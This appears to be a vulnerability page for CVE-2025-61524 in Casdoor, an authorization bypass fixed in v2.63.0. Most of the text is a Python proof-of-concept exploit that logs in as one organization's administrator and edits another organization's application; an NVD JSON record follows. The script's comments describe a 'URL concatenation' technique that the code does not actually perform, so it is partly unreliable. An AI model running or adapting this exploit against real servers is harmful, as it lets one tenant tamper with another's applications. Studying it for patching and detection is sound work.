CVE-2025-61524

# CVE-2025-61524 PoC - Casdoor Permission Verification Bypass # This PoC demonstrates the URL concatenation attack to bypass permission verification import requests # Target Casdoor server TARGET_URL = "http://target-casdoor-server:8000" # Step 1: Login as an authenticated administrator of any organization def login(username, password, org_name): session = requests.Session() login_url = f"{TARGET_URL}/api/login" login_data = { "username": username, "password": password, "organization": org_name } response = session.post(login_url, json=login_data) if response.status_code == 200: # Extract authentication token from response token = response.json().get("data", {}).get("token") if token: session.headers.update({"Authorization": f"Bearer {token}"}) return session # Step 2: Bypass permission verification by URL concatenation def exploit_permission_bypass(session, target_org, target_app): # The vulnerability allows accessing other organizations' resources # by concatenating the target organization/application in the URL bypass_url = f"{TARGET_URL}/api/edit-application" # Directly access another organization's application edit interface payload = { "owner": target_org, # Target organization (not the attacker's org) "name": target_app, # Target application name "displayName": "Modified by Attacker", # ... other malicious modifications } response = session.post(bypass_url, json=payload) return response # Step 3: Execute the attack if __name__ == "__main__": # Login as admin of organization A session = login("attacker_admin", "password123", "organization-a") # Bypass permission check to modify organization B's application result = exploit_permission_bypass(session, "organization-b", "target-app") if result.status_code == 200: print("[+] Permission bypass successful!") print("[+] Successfully modified target organization's application") else: print("[-] Exploit failed") # Note: This PoC is for educational and authorized testing purposes only. # The vulnerability is fixed in Casdoor v2.63.0.

{"cve": {"id": "CVE-2025-61524", "sourceIdentifier": "[email protected]", "published": "2025-10-08T19:15:44.720", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "An issue in the permission verification module and organization/application editing interface in Casdoor v2.26.0 and before, and fixed in v.2.63.0, allows remote authenticated administrators of any organization within the system to bypass the system's permission verification mechanism by directly concatenating URLs after login"}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.2, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.2, "impactScore": 5.9}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-285"}]}], "references": [{"url": "http://casdoor.com", "source": "[email protected]"}, {"url": "https://gist.github.com/DevHjz/e75cea851d48e5f5478ac2a90757851a", "source": "[email protected]"}, {"url": "https://github.com/casdoor/casdoor/commit/d883db907bb6e0b95737ef8e8b57b7da9078cbdd", "source": "[email protected]"}, {"url": "https://github.com/casdoor/casdoor/releases/tag/v2.63.0", "source": "[email protected]"}, {"url": "https://gist.github.com/DevHjz/e75cea851d48e5f5478ac2a90757851a", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0"}]}}